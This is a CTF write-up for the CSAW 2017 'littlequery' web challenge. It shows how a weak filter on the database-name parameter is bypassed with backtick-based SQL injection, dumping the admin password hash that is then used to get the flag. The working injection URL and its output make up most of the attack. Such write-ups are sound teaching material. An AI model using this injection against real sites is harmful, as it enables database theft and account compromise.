CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

problem description

LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io<


on first page source code there is html comment for some api

/api/db_explore.php">API</a></p> kquote>


check it

Must specify mode={schema|preview}

lets try schema

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema

{"dbs":["littlequery"]}


this feature enable us to see db structure

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user

{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

if we try to see content using preview we are blocked

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user

Database 'littlequery' is not allowed to be previewed.

but this looks like dummy filter

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user

`littlequeryTEST`.`user` doesn't exist.

so db query somehow like this

select * from `$db`.`$table`


since littlequery in db var is blocked we can do sqlinj

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=

[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

and there u got hash

use it to login passed hash directory in post and get flag

flag{mayb3_1ts_t1m3_4_real_real_escape_string?}


H2
H3
H4
3 columns
2 columns
1 column
Join the conversation now
Logo
Center